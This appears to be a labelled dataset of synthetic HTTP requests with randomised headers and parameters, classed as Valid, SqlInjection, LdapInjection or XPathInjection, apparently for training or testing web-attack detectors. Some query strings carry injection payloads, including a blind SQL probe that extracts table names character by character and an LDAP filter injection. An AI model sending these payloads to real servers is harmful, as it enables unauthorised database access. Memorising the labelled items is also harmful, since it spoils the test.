ETag: W/"zqSNf80KOhG4_gtigkN"
Expect: Ol2jw
From: meebonii@Etgu.be
If-Modified-Since: Mon, 04 Feb 08 20:11:50 GMT
If-Unmodified-Since: Sat, 02 Apr 05 11:14:09 GMT
If-Match: *
If-None-Match: "QykoynD1giIDydu3Z."
If-Range: *
Max-Forwards: 5
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: av6on gevp5=fEhrwh
Authorization: NTLM Zm1pc2hOZm5zYWxhZWVFaHUzSGFjcXNlM1RjdXR0b2JBZUVpbXRnaG82YTQ=
Range: 51061-93,46103-3,-27
Referer: /2rsgGn.nsf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/5.6 (compatible; MSIE 0.6; Solaris; it5ei3wnvt; t7eshmat)
UA-CPU: Sparc
UA-Disp: 4109,8794,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8498x1908
Via: nmsco/8.1 www.etEir.png:3183, 1.1 24.241.240.169, 3.6 86.156.255.56
Transfer-Encoding: whrt; iodyNbUu=foof
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 083 170.246.141.163 "Eoeoetconodpehi" 
X-Forwarded-For: 246.222.176.176
X-Serial-Number: 484018235309
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ttnioegmaaniao=tg&X&dao=a5r-W&kathedbermd=aails?t2e$&&nranos8aehE=160

End - Id: 7057
Start - Id: 293
class: Valid
GET /Rl66n/haxrt/tBdG_93sd7in29Y/t3XvvGIfVMJC3Y7BdGV6/ede0/f7F5qx4Ke@i/Nl5oF4WjLI/ss--orBqwZdb/tVvc3xxUPalqwEiM5/cm47from5/qtrie0trvldssti/DnepulUinithM.mspx?ikOoekjnrhtr9=0725&WXF2DoptTIt0=625144715&s7snen=eby7%29ZepYb+8e&tl9noaeel=8&Ehpbhsit5lsr=as&1m=Mdl&peei3t=831768038&e2Tiakthc6N=havingLoi%3F&f@.QlKv3KKQl=sunion HTTP/1.0
Host: 109.3.72.245
Connection: ennEsone
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress, deflate, identity;q=0.7
Accept-Language: galy-eoz;q=0.0
Cache-Control: no-transform
Client-ip: 192.62.16.252
Cookie: Kbg4=wKi7z.j
Cookie2: $Version="63"
Date: Wed, 11 Jan 06 04:48:32 GMT
ETag: "B-WOIA7_Juo070G2GXzx"
Expect: 9o0Znus0
From: atOG@okZhh.fr
If-Modified-Since: Sun, 01 Mar 09 23:18:55 GMT
If-Unmodified-Since: Mon, 08 Dec 08 12:04:10 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Basic RGhobGEwOjQxTXlhYnc=
Range: 126252-010334,-647
Referer: /esLco/fpnuhrp/Roko/eitr.tar.gz
TE: gzip;q=0.1,trailers
Trailer: Expect
User-Agent: t2ac@QI http://www.gonws17d.fr
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: 8.7 www.eoarctwG.gif, diErut/4.1 57.89.232.138, 9.6 72.170.164.246:768
Transfer-Encoding: compress
Upgrade: aeeh/6.3, fgRaE/4.4
Warning: 115 www.hone.jpeg "q3i0Eo0DcebhmerEuNtI" 
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 94210
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 293
Start - Id: 15703
class: Valid
GET /rf2ePaos/6Scs.6dIns29le/nodeNvEuIFBw/wNadHlw.Naehiy@2R/1wsvG3S/Erptorljes8a/J1jFB0IW/nvNB/6turObl2NQhu.htm?oOnes6ahrhsnos=9zC HTTP/1.1
Host: www.Eo1shD.it
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *;q=0.1
Accept-Language: te-ikOiaih, lrphgm-ebneliAs;q=0.3, na-eu, ls2dzMnm-snjntttN;q=0.2
Cache-Control: only-if-cached
Client-ip: 165.238.234.97
Cookie: mgqd6yih= qk6whereu;tbtPjheZp3=scriptz4aemochag7epSEsystemEe
Cookie2: $Version="81"
Date: Tue, 20 Apr 10 05:54:25 GMT
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Mon, 29 Nov 04 21:34:36 UTC
If-Unmodified-Since: Thu, 07 Apr 05 11:21:18 GMT
If-Match: ".qYlCuc3exL7NO9Nx"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: ilie a4w9w=thndvf
Range: -2
Referer: http://lhud.org/eTlM/trmisjg/spgtf/raeho3/relX.mp3
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/9.8 (X11; U; Linux i386 0.8; be-ie; rv:3.8.0) Gecko/25146428
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: FTP/3.4 249.83.18.65
Transfer-Encoding: eHhtn; rhRRkpe=etna
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 451 194.177.41.7 "maNtqhbf" 
X-Forwarded-For: 139.13.197.94
X-Serial-Number: 9307845835407773
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15703
Start - Id: 4832
class: Valid
POST /lo5tbsao0ho/tlxzefFllrrybl/HalVJanhtpassSBI/ehcCVvp6q/o._Jb-oYwmA/Fxg7/7QZJIq/aeean5feeaOoinIniB/iiUntwuranxulechlj/gjo/tyRrsxsrwrsHwe.tiff? HTTP/1.1
Content-Length: 33
Content-Language: ttnttYo,1os,wxoqtu
Content-Encoding: deflate
Content-Location: /et3r4H1n/isohCtn8/f3ndtrr/l5eeazTo.nsf
Content-MD5: bGlkM2V0c3JhaXJlaXRyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Feb 06 22:38:46 GMT
Last-Modified: Fri, 18 Aug 06 04:28:20 UTC
Host: www.o1kcnsBr.cz
Connection: keep-alive
Accept: text/xml, video/mpeg;q=0.0
Accept-Charset: utf-7, iso-8859-8-i, iso-8859-1;q=0.9, x-mac-cyrillic
Accept-Encoding: *;q=0.4
Accept-Language: ei5jh-j, 58ieex1t-n5nog;q=0.0, eaon-irgtnmf
Cache-Control: max-age=1515
Client-ip: 178.12.186.92
Cookie: ileiaOdhthyV=979;6xbrdw9=77xFV_Fc;elyi=o>>th;group byBTO=4108;Ercegti= >5mec4ifer;fca0Stuattsh7r=4330
Cookie2: $Version="13"
Date: Sun, 01 Apr 07 04:34:26 UTC
ETag: "_.Wi-eBBGDIz1mEb8R"
Expect: ooeanLi=w31yca;ekcitth
From: leaTmHa@pheie.net
If-Modified-Since: Wed, 14 Feb 07 24:08:17 GMT
If-Unmodified-Since: Sun, 28 Mar 10 13:28:55 GMT
If-Match: *
If-None-Match: "riB7mVru9GrHATbC0gu"
If-Range: Sun, 29 Jan 06 24:04:11 GMT
Max-Forwards: 83
MIME-Version: 0.6
Pragma: 2t='Siac2'
Proxy-Authorization: NTLM dGVyZHFuRXNSYWVlZ2Voa3VoY3Vtd2JkOGVlZTd5ZWV5bg==
Authorization: NTLM dHRvcnVyYU5jb0loZWlhaWVlbHN2bm9uaHRkU21iaHNlcg==
Range: 43-
Referer: http://www.nuehos.fr/sueux.cfm
TE: chunked
Trailer: If-Range
User-Agent: 9tprilnrl/3.7.4.9
UA-CPU: 68000
UA-Disp: 0621,287,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9174x0420
Via: 4.1 www.i3jh.jpg, 2.8 124.103.223.200
Transfer-Encoding: gzip
Upgrade: pltw/8.5, i0og/2.1, mto/5.0, khh/6.6, 54e/7.6
Warning: 256 www.esor2sne.html "tuocRrfoedT9hanfoqeo" "Sat, 03 Feb 07 19:15:16 UTC"
X-Forwarded-For: 191.124.85.186
X-Serial-Number: 408211072514512
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

joryeinhota=63&tai=eH7sfssksiarid

End - Id: 4832
Start - Id: 38257
class: LdapInjection
GET /ee5k8l3dychdteeeaw/.w_Izbgsound7TKY5C/ebdrUidrftraoCrh3old/nsbSygE/oT/u4.LproFUcq5bR2/agID1/jj6komwL.mmd.php3?uNgina4mdoIs=e6F&rtoT7e=rtioeahtv3TduqiKes&ynslneiitbltEbo=wmfn&e9cbcssn=1355836&g8NperlHmF=p&ot96e=gmldaenimg8ta6%7E&hee28es6=rtteyhei8&eNm=7&ieNheotyhh=8746649&twd=sJdk3RY&lkKX=39&mearuictnN=%29%28%7C++%28displayName%3Dhad*%29+%28name++++%3D++++had*++++%29%28++mail%3Dhad*+%29&yfsum=msf&daceth3v=iltin%27oweunDtmpg HTTP/1.1
Host: www.to2npsR.org
Connection: keep-alive
Accept: text/html;q=0.9
Accept-Charset: iso-8859-5;q=0.9, iso-8859-3
Accept-Encoding: 
Accept-Language: aHRay-nre0, pta4smnr-obm, heh-naeWrh5;q=0.7
Cache-Control: tqenr='lre'
Client-ip: 113.81.106.78
Cookie: eomlNt075oinC=(
Cookie2: $Version="74"
Date: Tue, 07 Dec 04 21:29:45 GMT
ETag: W/"DNHJE2Dphp9snBkz4oAm"
Expect: seeqhc=sss6
From: Eorust@uthn0.it
If-Modified-Since: Sun, 03 Dec 06 16:45:44 CET
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: "4iUvBlWQe9m2v3_JBO"
If-None-Match: "coOejr864b_ZOWknmw"
If-Range: Fri, 21 May 04 15:48:42 GMT
Max-Forwards: 7904
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Digest qop=ooehpwd
Range: -23
Referer: http://www.efEdte.net/haomm.jpg
TE: chunked,deflate
Trailer: Proxy-Authorization
User-Agent: sHINUevA_Y http://www.ntXot.fr
UA-CPU: PowerPC
UA-Disp: 087,798,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8163x303
Via: 5.6 www.hety.css, 0.4 97.201.217.41:83070, aad/6.8 www.vmaei.gif
Transfer-Encoding: compress
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38257
Start - Id: 41815
class: SqlInjection
GET /eOdtEruheineoxozcs/lmliyTGqrkafi5d/gwsfccboxNEMlsnrvXD/nCy9gsBnO_F4oCO7/bo5qc5eFiPV/o7te8toea.gif?Mnoqsxadcvko=1&.Hmncvg=nlsen3sanr&5fnvt=e7YEeivf4aeo&3mi8rTEktt5tr=84551&Jl=1445378&np1eoCnw=0977&awdrisa=%27++++group+++++by++++users.id+++++having++90%3D90 HTTP/1.0
Host: 162.203.111.190
Connection: Sk1ufi
Accept: */*
Accept-Charset: cp-932, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: ayersdbe-gsa7ew, bdeoiyeM-mihy7;q=0.8, ttzosnls-8, ip0-nintwaef, f-mlo;q=0.1
Cache-Control: or='t'
Client-ip: 209.250.197.168
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="5"
Date: Wed, 22 Jun 05 07:00:27 UTC
ETag: "Dd5MBEp1RkTm.bHVt"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 06 Apr 06 21:41:49 UTC
If-Unmodified-Since: Thu, 17 Feb 05 09:30:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.0
Pragma: hae6f='n6hco6'
Proxy-Authorization: NTLM cndwb3RsbDd0ZGh1MGpudWRhYXFkcmVpaWFhZWJhaTZpbm9sZVVBdHV0NXI2ZGE=
Authorization: NTLM czB1NG9hYjd0b3RmcnQ4ZWRlZW5venRpNGVyZWl6c254YXNlZXpmbg==
Range: 340098-821
Referer: http://www.uencaahY.com/rZha.php3
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (compatible; MSIE 0.9; Win 9x; TnMn3Nar)
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: 8.2 www.Ynzjeoew.jpeg, 5.5 162.19.106.69
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 312 103.181.43.135 "neoicnFqurorecs" 
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 34361564811
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41815
Start - Id: 3109
class: Valid
GET /4rttP5/nnunsuOuaccv/uP8@yiTGJlScnx/8lcrrcaihaeel/dLUuS6Yia/rlhklvorhpIjogEemt.js?nit=kQbuWG&E00kt8untm=401&smaodswGufttdh=htcoeiOzyoriehie&iljttazImhe=xtermqpta-ici2&5t9eea7=7a0t%3Be&o7kiaggto=8Dssvisa+ei&scriptz5lECk=egDexec&cehh3oxtt=RdtEatozlae&38hCinriz7=54848&1lEcTaifd5aw=wnejes%2F&nsppmay=cssegtAHpo&adaiorsATejrI=61&irphfnohx3eCeh=xe+vi7&zA@NhttpsY4yR=Tey&tp=20241227 HTTP/1.0
Host: www.mhlncldxta.biz
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: windows-1254;q=0.6, windows-1253, gb2312;q=0.6
Accept-Encoding: 
Accept-Language: ef-0A;q=0.9, ve-nrd0d;q=0.8
Cache-Control: e='a7ocHacO'
Client-ip: 166.58.131.193
Cookie: caeor=/  ;os=nieaa0zte = tnit&n\;nk-3XoONfii=4648;ttlt=rteq8m1AtMrA
Cookie2: $Version="53"
Date: Thu, 23 Jun 05 11:18:19 GMT
ETag: "4Ll0_82lrVtR2rBjtA"
Expect: uC40=ureig
From: umtse@bRic1aonle.cz
If-Modified-Since: Thu, 02 Jul 09 17:54:57 CET
If-Unmodified-Since: Fri, 10 Jun 05 24:48:04 UTC
If-Match: "glP6@51npR_Y9kSy2LNR"
If-None-Match: *
If-Range: "_DoDx6LPFdvaehrN"
Max-Forwards: 6
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: Basic aWJlNmx1emQ6U29sMW1h
Range: 08395-
Referer: http://www.sydoej.com/yegrje/icmfc6.msf
TE: gzip;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/4.4 (Windows; U; WinNT 0.2; ea-tu; rv:7.9.7) Gecko/20197379
UA-CPU: 68000
UA-Disp: 0502,1250,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3082x5034
Via: 4la/8.1 www.ilss.html, fyhcnz/8.4 www.tsanyE.css
Transfer-Encoding: identity
Upgrade: 6te/4.3, reiog/2.9, ctnoo0/7.3, hxHaad/5.5, ldtkhe/8.4
Warning: 690 25.36.240.58 "khpSxlij80Psteslo" "Tue, 28 Oct 08 11:10:05 CET"
X-Forwarded-For: 240.223.9.140
X-Serial-Number: 50270
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3109
Start - Id: 30649
class: Valid
GET /w3j.Mlog/dRW.ieMrq1otPScsrPk/oteEhHaaheFpesdtc/ts1V2/zZRpRreplaceKlp4wfr/eimcsfJuJ1@t@.css?wtheerorasgrrug=svbscriptrki&iRthr=772064&gxvrt7D=2nDamoxa&iw=eroo HTTP/1.1
Host: www.utwaeU7.ch:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=26
Client-ip: 208.242.86.47
Cookie: dickhsex2epa=v.Ow;onsajr9dtebtt=776718;rp5tkenluc=sAPT;Iwkarm2=aEGk
Cookie2: $Version="0"
Date: Wed, 19 Sep 07 19:40:32 CET
ETag: "Meg1EzYAlaX5p7IE"
Expect: fi1alor=b4fh
From: 5mirr@nzOn.fr
If-Modified-Since: Sat, 05 Apr 08 02:11:44 CET
If-Unmodified-Since: Mon, 27 Apr 09 08:16:39 UTC
If-Match: "P@0M@vSS2ftLcKGO5AF"
If-None-Match: "0JMtFr2TcmI0i8ZhWU"
If-Range: Mon, 26 Apr 10 17:17:45 GMT
Max-Forwards: 6
MIME-Version: 8.0
Pragma: s=hiBhaq
Proxy-Authorization: dsoan 0sitr=Hnaoh
Authorization: ttyt nseoAsof=arosOc
Range: 0-,163-,68-6
Referer: http://sLwei.be/nbew/pbtdr/IerySeo/eetid/6eeearg.cfm
TE: chunked;q=0.0,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: eatbelr/0.8.3.5.9
UA-CPU: PowerPC
UA-Disp: 251,682,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: nrNera; 2et6=maoue
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 720 www.EsiaJw.png "nonetehehweionsu" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 472936518137
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30649
Start - Id: 7740
class: Valid
POST /a74c-oA3If1V/rprebo2/xCwb@Gk/yrteI.htm? HTTP/1.1
Content-Length: 88
Content-Language: relmR8,sija
Content-Encoding: identity
Content-Location: /Srrh/NeomEnrt.jsp
Content-MD5: dG5oc21ub2F1enV2TXRlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Nov 05 20:51:35 CET
Last-Modified: Sat, 31 Jul 04 12:45:37 CET
Host: 229.190.241.239
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress, gzip
Accept-Language: aunnye-eao;q=0.2
Cache-Control: only-if-cached
Client-ip: 29.49.164.102
Cookie: 07ei4NEsweer=%ir;ngeEe=426131;unenSfh=roowherenftf
Cookie2: $Version="079"
Date: Sun, 03 Jan 10 10:41:42 GMT
ETag: "1pi9VDQJ-muP2k4P2BrJ"
Expect: 100-continue
From: hens@6t6o.org
If-Modified-Since: Sat, 30 Jun 07 02:42:43 UTC
If-Unmodified-Since: Tue, 15 Aug 06 03:59:11 GMT
If-Match: "F-gCH.RA0uIYY1U7"
If-None-Match: *
If-Range: Sat, 28 May 05 07:18:22 CET
Max-Forwards: 696
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: nlWd 2e8avieh=tri7nwl
Authorization: eoutrw tsuei=nnwhoxhe
Range: 176685-
Referer: /mgtt9ir9/wtSeI0.php
TE: trailers,deflate;q=0.0
Trailer: Date
User-Agent: Mozilla/9.8 (Windows; U; Win 9x 2.3; Bu-ps; rv:3.1.9) Gecko/62420829
UA-CPU: Sparc
UA-Disp: 0857,811,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 109x301
Via: 8.1 www.bis3pzw.htm
Transfer-Encoding: compress
Upgrade: oboir/9.1, tneh/8.0, sslA/3.6, rePhmj/5.9, bsdgN/4.4
Warning: 112 167.121.246.207 "peiebel2" "Wed, 16 May 07 08:35:19 CET"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 755834931599886
----: ----------
~~~~~: ~~~~~~~~~~

dqigEnptALekos=2&rissstm=zycw2cu&dinnBe=1s1aG&ccrdee=teniibrH&eE6ug9Zsl1=rr.@Cr&ana=34

End - Id: 7740
Start - Id: 13238
class: Valid
GET /.f7likencv/dMoe/rj5WbgmjuJuvEhZn/stneNl/r2et/lMxJu9Grn_e_/eEBDdo5Z4Uau_jeLg.css?sedRo=533 HTTP/1.1
Host: 69.139.219.224
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312, x-mac-chinesesimp
Accept-Encoding: *;q=0.2
Accept-Language: ufrhs-o;q=0.7, ctls-r
Cache-Control: no-cache
Client-ip: 249.6.232.247
Cookie: ha9aehjbs7=5jfrom;as2sudEe=rceddq2n6objectaennh
Cookie2: $Version="9"
Date: Sun, 16 Dec 07 15:28:41 UTC
ETag: W/"6JCDvI-kKr1dGTKJuW"
Expect: i9hsauA
From: n7Oyrrss@th5Bs.cz
If-Modified-Since: Fri, 01 Sep 06 03:43:00 GMT
If-Unmodified-Since: Mon, 03 Oct 05 15:40:18 GMT
If-Match: *
If-None-Match: "xyV@_3ln1tWl4cY13MWE"
If-Range: "KbRPVEq_lonzPOigDH"
Max-Forwards: 3009
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: oltt icps=utniXm
Authorization: 1rsMut ot8ob=edsii
Range: 16-5
Referer: /mtuakhl/et0l.sh
TE: deflate,deflate
Trailer: Pragma
User-Agent: rs2nbndne/0.2.6.3
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: deflate
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 198 157.148.141.227 "pngahiabduinT" 
X-Forwarded-For: 142.206.28.5
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13238
Start - Id: 41906
class: SqlInjection
GET /b0Ntttedrttaih/ihUiy8/oZ621SO5YehNX./rrh8/aqH7@C6tIrw.-uQz/TJ.tiff?nsifavnfs0=AND+ascii%28lower%28substring%28%28SELECT+TOP++1+++Sq+++FROM++++sysobject+++++WHERE+++++xtype++++%3D+++%27U%27++++%29%2C1%2C1%29%29%29+++++%3E+++111&TsyszbE2tt=00884&MeuUzMe3huCurii=53020000&esdmtL=x%40CJ8q&connectevalUH=07099670&Ar=cebmUih%3Ecee&ntnoetlye=l4AiyE%25&sdlumoespitgE3t=834&7n0m=x9- HTTP/1.1
Host: www.eihUneeb.org
Connection: close
Accept: video/quicktime;q=0.5, application/*
Accept-Charset: windows-1255, x-mac-chinesesimp, ks_c_5601-1987
Accept-Encoding: gzip;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 199.227.44.84
Cookie: dna8=i;nacmPh9gn6tr=';AjvEvar=36335
Cookie2: $Version="24"
Date: Wed, 19 Aug 09 07:29:05 GMT
ETag: W/"NqsDhYv0afOW86tr"
Expect: nvsci=uffmeHo
From: whodpi@rrheriuA.net
If-Modified-Since: Tue, 19 Jul 05 21:15:05 GMT
If-Unmodified-Since: Sat, 10 Nov 07 23:23:12 GMT
If-Match: "xgcg6lFX8YmoD1R"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 4.7
Pragma: 2=et
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: moao ssda=ilwhdez
Range: 814292-
Referer: http://mern0.com/xntck/riC5ozr/CEow/6iufXs/werz.php
TE: trailers
Trailer: Via
User-Agent: sueaei/4.6.2.7
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/6.3 www.ldiedm8.js, 1.5 57.87.41.62, FTP/6.8 112.208.48.17
Transfer-Encoding: Edrt; rNt4este=kln1h
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 953 227.225.5.69 "srsmu" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41906
Start - Id: 20475
class: Valid
GET /aP4j1PqtjODm2MfXXO/sdvw@.vL7SS2dMa.asmx?xc=wYgLMXt%40BjDX&amr=E+gsthnned&e2lq08xSwitsew=eNHNbf&sr=at%3FmvefnyKih9rt&ed2rsewIn=ciL&n8pxRfde=ilAivYzgNiR&1ofsp=%2Foxitmota&DzQstylehc=nehjAwsehg&oteGo=sneldeleterbeetT&_RNtbOy=ngn&s6niyhsq8=361211 HTTP/1.1
Host: 218.206.197.145
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=9046
Client-ip: 164.13.187.97
Cookie: deneh=321241;Gcw2eeohehfrhia=ynootT2rreplaceenl;hOtYie5c=KtttexH
Cookie2: $Version="4"
Date: Sat, 24 Dec 05 13:33:07 GMT
ETag: W/"Is@XSf_HWEDFZPK9"
Expect: ogeh=nqe4t4ie;nrlvx
From: nEews@dw3jo7epe.net
If-Modified-Since: Sun, 06 Mar 05 11:10:54 UTC
If-Unmodified-Since: Mon, 11 Dec 06 17:01:47 UTC
If-Match: "@cWdRfDJfRkmyBNy4F"
If-None-Match: *
If-Range: Sun, 20 Aug 06 12:10:39 GMT
Max-Forwards: 02
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: oceen Sioaion2=uuye9
Authorization: asoseo etbic7ht=w2nE
Range: -896,61-724379,-171
Referer: http://www.penne.be/nlberry/dan9imsm/reqdsjdD/oas3.tiff
TE: gzip,trailers,trailers
Trailer: From
User-Agent: mf3ors/8.7.9
UA-CPU: MIPS
UA-Disp: 7837,8388,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3372x6941
Via: 0.1 155.91.227.174, FTP/8.3 www.2tm7ec6r.shtml, 0.8 www.tgh8.css
Transfer-Encoding: deflate
Upgrade: qrcge/0.3, lfahc/7.7
Warning: 110 www.d60luTe.jpg "59esioIghwfli3thd" "Sun, 17 Apr 05 18:13:34 CET"
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 5549122
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20475
Start - Id: 10901
class: Valid
GET /xx5eszuahtmar35s/toiecin/2DRBqDs5oK/X5Fe5a3smrinsertO-HG/taclnfaea/0@PsKx4LcIEkL/eecx2Yi-y7f@jAqZ0/a_yUuQh63z6@VOJb6@7b/iERv/vwRX5z3PVNZ.C5.mspx?kcemi80a=t&oNe2toelIaso8n=eh+O&luaudt=2236&ili=4494&u6hfssea=18 HTTP/1.1
Host: 176.104.207.152
Connection: keep-alive
Accept: application/*;q=0.0, application/*;q=0.9, audio/basic;q=0.2
Accept-Charset: x-mac-icelandic, iso-8859-8;q=0.1, windows-1252;q=0.0, x-mac-roman, iso-8859-4
Accept-Encoding: 
Accept-Language: *
Cache-Control: ota='hx'
Client-ip: 154.30.238.254
Cookie: i--Bu=oRT;hneOtrPra=caoensnemrarsee2l;imgX42IT=07;R0aoaieirdi=1e=so;nsfArw1=qsocopyhegk ;rtPulhbeiinnea=>hiselectamechodsmail3e (hVrtelnet1b
Cookie2: $Version="5"
Date: Sat, 11 Dec 04 23:41:30 UTC
ETag: "benA1.-c9hUoLHy"
Expect: krhw
From: sjinbel@nefsyte.ch
If-Modified-Since: Mon, 02 Jan 06 12:39:15 CET
If-Unmodified-Since: Wed, 10 Nov 04 22:41:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 5.9
Pragma: asRn7=iqo
Proxy-Authorization: atsuIo ssTe=rsipu
Authorization: NTLM dW9vZXN0ZDJzdnFpZTFtMmllN3VhdDBhaWlpcmVpQjc0ZW1zNmVxaWNlZG1hOXRl
Range: 588592-19738,0954-52796,229852-
Referer: http://www.hasdOhun.uk/iEfp.cfm
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: imhienie (eg7cB8N; u1pNBKEXwp; enBiEor; aqPIHuQwoR; ji2YF6CAs2)
UA-CPU: PowerPC
UA-Disp: 2674,4710,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 488x175
Via: 9.0 www.s3Er.htm, 8.3 239.101.192.49
Transfer-Encoding: gzip
Upgrade: zitfn/8.6, ijcqg/4.3
Warning: 301 www.ebkTeia.jpeg "cruweuettgs" 
X-Forwarded-For: 250.170.187.7
X-Serial-Number: 70193457062638076597
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10901
Start - Id: 35545
class: XPathInjection
PUT /aZdACZj/yjUtgzW2vM/ai.gif? HTTP/1.0
Content-Length: 150
Content-Language: d,ndt,8dir
Content-Encoding: compress
Content-Location: /Notn/b6staey/Tidmxten/scwbhe/3teu6lc.jsp
Content-MD5: ZWVpYXNvZjNnYXVzOU5mbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Feb 06 18:55:37 GMT
Last-Modified: Thu, 08 Feb 07 06:58:41 GMT
Host: 152.52.149.151:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: raQtrts-c;q=0.7, twn-zrabxl, lNteiwm-blrnHaea, vnee-9oo;q=0.6
Cache-Control: only-if-cached
Client-ip: 20.198.192.186
